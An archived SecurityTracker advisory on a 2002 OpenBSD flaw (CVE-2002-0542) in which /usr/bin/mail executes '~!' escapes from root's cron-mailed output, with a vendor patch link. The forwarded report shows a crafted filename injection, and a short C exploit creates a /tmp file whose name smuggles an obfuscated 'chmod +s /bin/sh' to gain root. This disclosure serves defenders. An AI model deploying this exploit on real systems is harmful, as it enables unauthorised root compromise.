SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Client)  >   mail (/usr/bin/mail) Vendors:   OpenBSD
OpenBSD '/usr/bin/mail' May Let Local Users Execute Commands With Root Privileges By Specifying a Malicious Crontab Entry
SecurityTracker Alert ID:  1004024
SecurityTracker URL:  http://securitytracker.com/id/1004024
CVE Reference:   CVE-2002-0542   (Links to External Site)
Updated:  Apr 30 2004
Original Entry Date:  Apr 11 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability was reported in '/usr/bin/mail' on OpenBSD. A local user that can specify a crontab entry may be able to cause arbitrary shell commands to be executed on the system with root level privileges.

It is reported that /usr/bin/mail allows a special escape sequence to be specified in the body of an email. This escape sequence specifies a shell comand to be executed, as described in the mail(1) man page:

~!command

A local user that can specify a cron file name may be able to cause arbitrary commands to be executed with root privileges when the cron job is run.

Demonstration exploit code is provided in the Source Message.

The author of the report credits urbanek@openbsd.cz for discovering vulnerability.

Impact:   A local user that can specify cronttab entries may be able to cause arbitrary shell commands to be execute with root privileges, giving that user root level access to the system.
Solution:   The vendor has developed a patch, available at:

http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24

Vendor URL:  www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24 (Links to External Site)
Cause:   Input validation error
Underlying OS:  UNIX (OpenBSD)
Underlying OS Comments:  OpenBSD 3.0-current (and below, before 8 Apr 2002)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Openbsd Issues Fix) OpenBSD '/usr/bin/mail' May Let Local Users Execute Commands With Root Privileges By Specifying a Malicious Crontab Entry
The vendor has released a fix.



 Source Message Contents

Subject:  local root compromise in openbsd 3.0 and below


There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr
2002). 

Full problem report and exploit below. FreeBSD is not vulnerable.

----- Forwarded message from urbanek@openbsd.cz -----

From: urbanek@openbsd.cz
To: gnats@openbsd.org
Subject: user/2536: possible root compromise using /usr/bin/mail 

>Number:         2536
>Category:       user
>Synopsis:       crontab entry allows possible arbitrary comand execution
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    bugs
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Mon Apr  8 13:30:02 MDT 2002
>Last-Modified:
>Originator:     Milos Urbanek
>Organization:

>Release:        all relases including CURRENT
>Environment:
	
	System      : OpenBSD 3.0
	Architecture: OpenBSD.i386
	Machine     : i386
>Description:

        program /usr/bin/mail allows a special escape sequence to
        be specified in the body of an email; this escape sequence
        specifies a shell comand to be executed

        as mentioned in mail(1):

~!command
             Execute the indicated shell command, then return to the message.


        Problem:
        default root crontab entry looks like:

        # do daily/weekly/monthly maintenance
# on monday only (techie)
30      1       *       *       1       /bin/sh /etc/daily 2>&1 | tee /var/log/d
aily.out | mail -s "`/bin/hostname` daily output" root
30      3       *       *       6       /bin/sh /etc/weekly 2>&1 | tee /var/log/
weekly.out | mail -s "`/bin/hostname` weekly output" root
30      5       1       *       *       /bin/sh /etc/monthly 2>&1 | tee /var/log/monthly.out | mail -s "`/bin/hostname` monthly output"
 root


        If there is something in files /etc/daily, /etc/weekly or /etc/monthly
        which could enable the attacker to insert its own input,
        like a malformed filename

         chiba:5$ touch \~!haha
         chiba:6$ ls -al *haha*
        -rw-r--r--  1 milos  milos  0 Apr  8 19:30 ~!haha

        or by other means like output from log files under /var/log,

        the attacker can execute arbitrary comand running under root
        privileges which can lead to the root compromise.


>How-To-Repeat:
        read the man page, and see above
[...]

----- End forwarded message -----

Patch: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24

Exploit:

/*
 * (c) 2002 venglin@freebsd.lublin.pl
 *
 * OpenBSD 3.0 (before 08 Apr 2002)
 * /etc/security + /usr/bin/mail local root exploit
 *
 * Run the exploit and wait for /etc/daily executed from crontab.
 * /bin/sh will be suid root next day morning.
 *
 * Credit goes to urbanek@openbsd.cz for discovering vulnerability.
 *
 */

#include <fcntl.h>

int main(void)
{
	int fd;

	chdir("/tmp");
	fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);

	if (fd) 
		close(fd);
}

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC